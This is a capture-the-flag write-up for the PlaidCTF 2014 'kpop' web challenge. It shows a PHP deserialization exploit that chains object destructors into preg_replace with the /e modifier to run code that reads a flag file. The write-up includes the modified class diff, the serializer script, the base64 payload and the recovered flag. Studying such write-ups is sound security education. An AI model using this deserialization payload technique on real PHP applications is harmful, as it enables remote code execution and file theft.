PlaidCTF Quals 2014 web-200: kpop

Sometimes, the Plague leaves some of his old stuff up and running. We found a K-Pop lyrics website the Plague wrote back when he was learning to program. It was open-source, too! We believe there might be something important in /home/flag/flag. Could you get it for us?

After some code analysis I found a serialization vulnerability. To be more precise, we can substitute regular expression containing php code in the class LogFileFormat and execute it using the modifier “e” (Lyrics class destructor shall be executed when deserializing, which will perform Song->Log, which will perform Logger->log, which will execute our code with preg_replace).

Let’s change a little bit classes.php, serialize malformed class and import him.

diff --git a/classes.php.orig b/classes.php
index cab4690..c0d0042 100644
--- a/classes.php.orig
+++ b/classes.php
@@ -59,7 +59,8 @@ class Song {
   function __construct($name, $group, $url) {
     $this->name = $name; $this->group = $group;
     $this->url = $url;
-    $fltr = new OutputFilter("/\[i\](.*)\[\/i\]/i", "<i>\\1</i>");
+    //$fltr = new OutputFilter("/\[i\](.*)\[\/i\]/i", "<i>\\1</i>");
+    $fltr = new OutputFilter("/(.*)/e", "readfile('/home/flag/flag')");
     $this->logger = new Logger(new LogWriter_File("song_views", new LogFileFormat(array($fltr), "\n")));
   }
   function __toString() {

Serializator:

<?php
require_once './classes.php';

$l = new Lyrics("lyrics", new Song("songname", "test", "url"));
echo base64_encode(serialize($l));

➜  kpop  php serializator.php
Tzo2OiJMeXJpY3MiOjI6e3M6OToiACoAbHlyaWNzIjtzOjY6Imx5cmljcyI7czo3OiIAKgBzb25nIjtPOjQ6IlNvbmciOjQ6e3M6OToiACoAbG9nZ2VyIjtPOjY6IkxvZ2dlciI6MTp7czoxMjoiACoAbG9nd3JpdGVyIjtPOjE0OiJMb2dXcml0ZXJfRmlsZSI6Mjp7czoxMToiACoAZmlsZW5hbWUiO3M6MTA6InNvbmdfdmlld3MiO3M6OToiACoAZm9ybWF0IjtPOjEzOiJMb2dGaWxlRm9ybWF0IjoyOntzOjEwOiIAKgBmaWx0ZXJzIjthOjE6e2k6MDtPOjEyOiJPdXRwdXRGaWx0ZXIiOjI6e3M6MTU6IgAqAG1hdGNoUGF0dGVybiI7czo3OiIvKC4qKS9lIjtzOjE0OiIAKgByZXBsYWNlbWVudCI7czoyNzoicmVhZGZpbGUoJy9ob21lL2ZsYWcvZmxhZycpIjt9fXM6NzoiACoAZW5kbCI7czoxOiIKIjt9fX1zOjc6IgAqAG5hbWUiO3M6NjoibGFsYWxhIjtzOjg6IgAqAGdyb3VwIjtzOjQ6InRlc3QiO3M6NjoiACoAdXJsIjtzOjM6InVybCI7fX0=

Import result:

The flag is One_of_our_favorite_songs_is_bubble_pop